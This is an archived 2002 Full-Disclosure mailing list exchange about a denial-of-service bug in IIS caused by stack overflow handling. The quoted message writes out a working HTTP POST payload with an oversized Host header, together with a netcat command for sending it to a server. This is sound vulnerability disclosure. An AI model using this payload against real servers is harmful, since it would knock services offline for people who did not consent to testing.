lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: full-disclosure at (Full Disclosure)
Subject: How to reproduce the IIS Host Header DOS

Heh. I thought my screenshot DID show exactly how to reproduce the bug:
You run SPIKE! :> You can download SPIKE 2.7 at - it's the exact version I used in
the demonstration screenshot.

You should read my actual commentary on the bug. The bug is actually IIS
servicing a stack overflow exception, and is not limited to
/_vti_bin/shtml.dll or any other particular file or directory. It also
affects IIS 5.1. It's not limited to the Host: field, as far as I can
tell. Any "stack overflow" exception will trigger this behavior.

Dave Aitel
Immunity, Inc.

On Fri, 2002-10-11 at 19:26, Joe Testa wrote:
> Hash: SHA1
> - From the screenshots and descriptions given in
> <>, it's not clear *exactly* how to
> reproduce the IIS Host header DoS.
> A POST request like the following (between the [begin] and [end] lines)
> will
> manually reproduce the IIS DoS condition:
> - -------------------------[begin]--------------------------------------
> POST /_vti_bin/shtml.dll HTTP/1.0
> Host: [32762 '/' characters]
> Content-length:      22
> - --------------------------[end]---------------------------------------
> This will cause the web service to consume 99% of the CPU for about 35
> seconds.  During this time, no other HTTP requests will be serviced.
> Attached
> to this email is the complete string to facilitate testing.  Use it with:
> $ nc x.x.x.x 80 < iis_dos
>    - Joe Testa, Rapid 7, Inc.
>    A145 B158 2CA7 00A2 BAE8  4A18 57E5 18E0 02B0 0839
> Version: GnuPG v1.0.7 (Cygwin32)
> iD8DBQE9p1w3V+UY4AKwCDkRAjHQAJ0Vx5c1rJvDY5+n2595Wq6NQbqwOACeNBBO
> GcA6qrjAE1Tj+Jqx3kE9U4Q=
> =RkVz
> (See attached file: iis_dos)

Powered by blists - more mailing lists